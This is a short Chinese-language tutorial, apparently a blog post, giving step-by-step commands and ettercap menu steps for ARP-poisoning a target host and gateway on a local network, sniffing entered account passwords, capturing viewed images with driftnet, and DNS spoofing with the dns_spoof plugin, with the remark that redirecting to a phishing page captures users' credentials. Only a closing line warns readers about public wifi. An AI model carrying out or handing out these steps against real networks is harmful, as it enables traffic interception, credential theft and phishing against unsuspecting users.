ARP欺骗原理：

在每台主机中都有ARP缓存表，缓存表中记录了IP地址与MAC地址的对应关系，而局域网数据传输依靠的是MAC地址(网络设备之间互相通信是用MAC地址而不是IP地址)

一、ARP欺骗

工具：ettercap（中间人攻击）

echo  > /proc/sys/net/ipv4/ip_forward

cat /proc/sys/net/ipv4/ip_forward （配置ip转发功能）

leafpad /etc/ettercap/etter.conf （修改配置文件）

搜索iptables，去掉两个#号，即：

ettercap -G（进入图形界面）

Sniff -> Unified sniffing -> 确定

扫描主机并查看主机列表

将要欺骗的主机add to target1，网关add to target2

Mitm -> ARP poisoning...

开始嗅探

在Connections查看嗅探到的数据

如果目标机在页面输入账号密码就会被捕获

二、捕获图片数据

工具：ettercap+driftnet

ettercap -G（进入图形界面）

重复上面的步骤

开启新终端，输入命令：

driftnet -i eth0

在中间的窗口里捕获到图片，你可以看到目标机加载的图片

三、DNS欺骗

leafpad /etc/ettercap/etter.dns

在微软处添加：

www.baidu.com A 1.1.1.1

ettercap -G（进入图形界面）

重复之前的步骤ARP欺骗的步骤，在start sniffing之前添加一个插件

双击启动dns_spoof

开始嗅探后，我们在目标机中ping一下百度

欺骗成功，如果将1.1.1.1改为钓鱼页面，就可以欺骗到用户账号密码

最后提醒大家，连接公共wifi时一定要小心！